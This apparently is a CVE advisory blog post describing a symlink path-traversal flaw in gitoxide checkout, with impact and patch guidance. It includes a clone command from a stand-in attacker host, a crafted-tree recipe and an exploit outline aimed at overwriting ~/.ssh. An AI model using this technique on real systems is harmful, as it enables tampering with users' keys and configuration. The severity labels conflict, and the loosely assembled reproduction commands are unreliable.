gitoxide, Symlink Path Traversal, CVE-2026-44471 (Critical) -DC-May2026-14

Listen to this Post

Intro

CVE-2026-44471 affects gitoxide, a Rust implementation of git, versions prior to 0.21.1. The vulnerability allows a maliciously crafted tree object to write an attacker-controlled symlink into any existing directory where the user has write permissions. During a `git checkout` operation using gitoxide, all symlink index entries are processed after regular files. They go through a shared gix_worktree::Stack, which internally uses gix_fs::Stack. The function `gix_fs::Stack::make_relative_path_current()` caches validated path prefixes. When the previous leaf component exactly matches the leading component(s) of the next path, the leaf-to-directory transition in `gix-fs/src/stack.rs` calls only delegate.push_directory(), not delegate.push(). In gix_worktree::stack::delegate::StackDelegate, when the state is State::CreateDirectoryAndAttributesStack, the method `Attributes::push_directory()` only loads attributes from the object database (ODB) and performs no security checks. The critical symlink metadata check and collision handling (via unlink-on-collision) reside inside StackDelegate::push(), inside create_leading_directory(). This function is completely bypassed for cached prefix paths. The final symlink is created with std::os::unix::fs::symlink, which follows symlinks in parent directories. An attacker can construct a tree containing duplicate symlink and directory entries to exploit this caching logic. For example, first create a symlink pointing to a sensitive directory (e.g., ~/.ssh), then a directory entry with the same name. The cached prefix treats the subsequent directory creation as a no-op security check, then the symlink creation follows the existing symlink to write anywhere. The issue is fixed in gitoxide 0.21.1 by ensuring that `push_directory()` also validates symlink collisions and enforces proper checks on cached paths.

DailyCVE Form

Platform: gitoxide
Version: <0.21.1
Vulnerability: Symlink path traversal
Severity: High
Date: 2026-05-13

Prediction: Already patched

What Undercode Say

Analytics – commands to reproduce and detect the vulnerability:

Clone a malicious repository (attacker controlled)
git clone --no-checkout http://attacker.com/malicious-repo.git
cd malicious-repo
git checkout -f HEAD
Manually craft a tree with duplicate symlink/directory entries
git mktree <<EOF
120000 blob xxx\tsymlink_to_ssh
040000 tree yyy\tsymlink_to_ssh
EOF
Check if gitoxide checkout follows the symlink
gix checkout --progress .
Detection: look for unexpected symlink creation outside worktree
find . -type l -ls | grep -E '\.ssh|\.config'

Exploit

Provide a tree with two entries for the same path: first a symlink pointing to ../../../../home/user/.ssh, then a directory entry. During checkout, the symlink is written (deferred). The subsequent directory entry uses cached prefix, bypasses `push()` security, so no collision check occurs. Then any file written later under that path will land inside ~/.ssh, allowing SSH key overwrite or addition.

Protection

  • Upgrade to gitoxide version 0.21.1 or later.
  • Apply patch from commit that fixes path caching logic (adds symlink verification in push_directory()).
  • Use standard `git` (not gitoxide) for untrusted repositories.
  • Enable filesystem protection like `fs.protected_symlinks=1` (sysctl) to restrict symlink following.

Impact

Arbitrary symlink write into any writable directory. An attacker can overwrite SSH keys, modify ~/.bashrc, plant malicious systemd user services, or hijack configuration files. Local privilege escalation possible if combined with sudo misconfigurations or cron jobs. No remote code execution by itself, but enables further compromise.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top